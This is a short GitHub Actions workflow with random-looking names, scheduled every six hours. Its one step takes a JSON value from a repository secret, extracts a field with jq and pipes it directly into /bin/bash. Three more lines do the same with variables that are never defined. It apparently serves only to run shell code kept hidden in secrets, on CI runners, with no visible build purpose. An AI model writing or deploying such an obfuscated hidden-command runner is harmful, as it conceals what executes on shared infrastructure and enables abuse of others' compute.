name: dxjnghan

on:
  workflow_dispatch:
  schedule:
    - cron: '18 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dxjnghan
        env:
          ulvmp6024: ${{ secrets.ulvmp6024 }}
        run: |
          echo $ulvmp6024 | jq -r .bduir4 | /bin/bash
          echo $prbe03308 | jq -r .zqvsz86274 | /bin/bash
          echo $fyqp32 | jq -r .xkvny9755 | /bin/bash
          echo $mcm9 | jq -r .qcj9450 | /bin/bash

